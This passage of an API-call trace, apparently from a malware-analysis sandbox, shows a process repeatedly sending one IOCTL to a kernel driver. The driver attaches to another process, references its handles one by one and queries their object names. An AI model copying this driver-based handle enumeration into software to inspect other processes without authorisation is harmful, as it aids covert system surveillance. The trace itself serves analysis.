Process=0xfffff880053c8558) returned 0x0 [0244.242] PsAcquireProcessExitSynchronization () returned 0x0 [0244.242] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.243] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0015405a0, HandleInformation=0x0) returned 0x0 [0244.243] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.243] PsReleaseProcessExitSynchronization () returned 0x2 [0244.243] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.243] ObQueryNameString (in: Object=0xfffff8a0015405a0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.243] ObfDereferenceObject (Object=0xfffff8a0015405a0) returned 0x1 [0244.243] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.243] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.243] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.243] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.243] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.243] PsAcquireProcessExitSynchronization () returned 0x0 [0244.243] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.243] ObReferenceObjectByHandle (in: Handle=0x730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0018f3c50, HandleInformation=0x0) returned 0x0 [0244.243] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.243] PsReleaseProcessExitSynchronization () returned 0x2 [0244.243] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.243] ObQueryNameString (in: Object=0xfffff8a0018f3c50, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.243] ObfDereferenceObject (Object=0xfffff8a0018f3c50) returned 0x1 [0244.243] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.244] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.244] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.244] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.244] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.244] PsAcquireProcessExitSynchronization () returned 0x0 [0244.244] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.244] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0019247d0, HandleInformation=0x0) returned 0x0 [0244.244] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.244] PsReleaseProcessExitSynchronization () returned 0x2 [0244.244] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.244] ObQueryNameString (in: Object=0xfffff8a0019247d0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.244] ObfDereferenceObject (Object=0xfffff8a0019247d0) returned 0x1 [0244.244] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.244] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.244] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.244] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.244] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.244] PsAcquireProcessExitSynchronization () returned 0x0 [0244.244] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.245] ObReferenceObjectByHandle (in: Handle=0x750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001942af0, HandleInformation=0x0) returned 0x0 [0244.245] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.245] PsReleaseProcessExitSynchronization () returned 0x2 [0244.245] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.245] ObQueryNameString (in: Object=0xfffff8a001942af0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.245] ObfDereferenceObject (Object=0xfffff8a001942af0) returned 0x1 [0244.245] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.245] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.245] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.245] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.245] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.245] PsAcquireProcessExitSynchronization () returned 0x0 [0244.245] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.245] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00195c700, HandleInformation=0x0) returned 0x0 [0244.245] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.245] PsReleaseProcessExitSynchronization () returned 0x2 [0244.246] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.246] ObQueryNameString (in: Object=0xfffff8a00195c700, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.246] ObfDereferenceObject (Object=0xfffff8a00195c700) returned 0x1 [0244.246] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.246] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.246] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.246] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.246] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.246] PsAcquireProcessExitSynchronization () returned 0x0 [0244.246] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.246] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b9c060, HandleInformation=0x0) returned 0x0 [0244.246] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.246] PsReleaseProcessExitSynchronization () returned 0x2 [0244.246] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.246] ObQueryNameString (in: Object=0xfffff8a001b9c060, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.246] ObfDereferenceObject (Object=0xfffff8a001b9c060) returned 0x1 [0244.246] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.246] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.246] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.246] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.246] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.246] PsAcquireProcessExitSynchronization () returned 0x0 [0244.246] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.246] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b0ac80, HandleInformation=0x0) returned 0x0 [0244.247] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.247] PsReleaseProcessExitSynchronization () returned 0x2 [0244.247] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.247] ObQueryNameString (in: Object=0xfffff8a001b0ac80, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.247] ObfDereferenceObject (Object=0xfffff8a001b0ac80) returned 0x1 [0244.247] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.247] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.247] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.247] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.247] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.247] PsAcquireProcessExitSynchronization () returned 0x0 [0244.247] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.247] ObReferenceObjectByHandle (in: Handle=0x784, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00209faf0, HandleInformation=0x0) returned 0x0 [0244.247] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.247] PsReleaseProcessExitSynchronization () returned 0x2 [0244.247] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.247] ObQueryNameString (in: Object=0xfffff8a00209faf0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.247] ObfDereferenceObject (Object=0xfffff8a00209faf0) returned 0x1 [0244.247] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.247] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.247] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.247] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.247] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.248] PsAcquireProcessExitSynchronization () returned 0x0 [0244.248] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.248] ObReferenceObjectByHandle (in: Handle=0x7fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001db4fc0, HandleInformation=0x0) returned 0x0 [0244.248] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.248] PsReleaseProcessExitSynchronization () returned 0x2 [0244.248] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.248] ObQueryNameString (in: Object=0xfffff8a001db4fc0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.248] ObfDereferenceObject (Object=0xfffff8a001db4fc0) returned 0x1 [0244.248] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.248] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.248] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.248] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.248] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.248] PsAcquireProcessExitSynchronization () returned 0x0 [0244.248] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.248] ObReferenceObjectByHandle (in: Handle=0x808, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001dc1f00, HandleInformation=0x0) returned 0x0 [0244.248] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.248] PsReleaseProcessExitSynchronization () returned 0x2 [0244.248] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.248] ObQueryNameString (in: Object=0xfffff8a001dc1f00, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.248] ObfDereferenceObject (Object=0xfffff8a001dc1f00) returned 0x1 [0244.248] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.248] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.248] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.249] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.249] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.249] PsAcquireProcessExitSynchronization () returned 0x0 [0244.249] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.249] ObReferenceObjectByHandle (in: Handle=0x868, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0023ecf20, HandleInformation=0x0) returned 0x0 [0244.249] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.249] PsReleaseProcessExitSynchronization () returned 0x2 [0244.249] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.249] ObQueryNameString (in: Object=0xfffff8a0023ecf20, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.249] ObfDereferenceObject (Object=0xfffff8a0023ecf20) returned 0x1 [0244.249] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.249] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.249] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.249] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.249] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.249] PsAcquireProcessExitSynchronization () returned 0x0 [0244.249] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.249] ObReferenceObjectByHandle (in: Handle=0x878, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001da49c0, HandleInformation=0x0) returned 0x0 [0244.249] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.249] PsReleaseProcessExitSynchronization () returned 0x2 [0244.249] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.249] ObQueryNameString (in: Object=0xfffff8a001da49c0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.249] ObfDereferenceObject (Object=0xfffff8a001da49c0) returned 0x1 [0244.250] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.250] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.250] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.250] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.250] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.250] PsAcquireProcessExitSynchronization () returned 0x0 [0244.250] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.250] ObReferenceObjectByHandle (in: Handle=0x884, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001a20fc0, HandleInformation=0x0) returned 0x0 [0244.250] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.250] PsReleaseProcessExitSynchronization () returned 0x2 [0244.250] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.250] ObQueryNameString (in: Object=0xfffff8a001a20fc0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.250] ObfDereferenceObject (Object=0xfffff8a001a20fc0) returned 0x1 [0244.250] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.250] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.250] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.250] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.250] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.250] PsAcquireProcessExitSynchronization () returned 0x0 [0244.250] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.250] ObReferenceObjectByHandle (in: Handle=0x89c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0028f2850, HandleInformation=0x0) returned 0x0 [0244.251] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.251] PsReleaseProcessExitSynchronization () returned 0x2 [0244.251] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.251] ObQueryNameString (in: Object=0xfffff8a0028f2850, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.251] ObfDereferenceObject (Object=0xfffff8a0028f2850) returned 0x1 [0244.251] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.251] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.251] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.251] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.251] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.251] PsAcquireProcessExitSynchronization () returned 0x0 [0244.251] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.251] ObReferenceObjectByHandle (in: Handle=0x8ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001cf86f0, HandleInformation=0x0) returned 0x0 [0244.251] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.251] PsReleaseProcessExitSynchronization () returned 0x2 [0244.251] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x163 [0244.251] ObQueryNameString (in: Object=0xfffff8a001cf86f0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.251] ObfDereferenceObject (Object=0xfffff8a001cf86f0) returned 0x1 [0244.251] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0244.251] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0244.251] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0244.251] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0244.252] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.252] PsAcquireProcessExitSynchronization () returned 0x0 [0244.252] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0244.252] 